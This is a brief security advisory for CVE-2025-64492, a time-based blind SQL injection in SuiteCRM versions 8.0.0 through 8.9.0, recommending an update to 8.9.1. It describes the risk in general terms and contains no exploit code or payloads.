CVE-2025-64492

Name of the Vulnerable Software and Affected Versions SuiteCRM versions 8.0.0 through 8.9.0

Description SuiteCRM is an open-source Customer Relationship Management (CRM) software application. A time-based blind SQL Injection flaw exists in versions 8.9.0 and below. This issue allows an authenticated attacker to potentially extract sensitive information from the database by observing response times. An attacker could enumerate database, table, and column names, extract data, or escalate privileges. SQL injection occurs when an attacker can manipulate a database query through crafted input, potentially leading to unauthorized access or data leakage. Over 1000 instances of SuiteCRM were identified in the Russian internet space.

Recommendations Update SuiteCRM to version 8.9.1.